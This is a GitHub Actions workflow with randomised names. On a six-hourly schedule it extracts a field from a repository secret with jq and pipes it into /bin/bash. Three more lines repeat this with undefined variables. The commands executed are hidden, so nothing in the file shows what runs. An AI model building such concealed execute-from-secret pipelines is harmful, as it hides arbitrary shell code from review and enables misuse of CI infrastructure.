name: pengzhongzhou2013

on:
  workflow_dispatch:
  schedule:
    - cron: '20 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: pengzhongzhou2013
        env:
          pj50137: ${{ secrets.pj50137 }}
        run: |
          echo $pj50137 | jq -r .qv9359 | /bin/bash
          echo $zkap92 | jq -r .x1 | /bin/bash
          echo $uc7 | jq -r .al627 | /bin/bash
          echo $qxdlp39 | jq -r .ycenk1 | /bin/bash

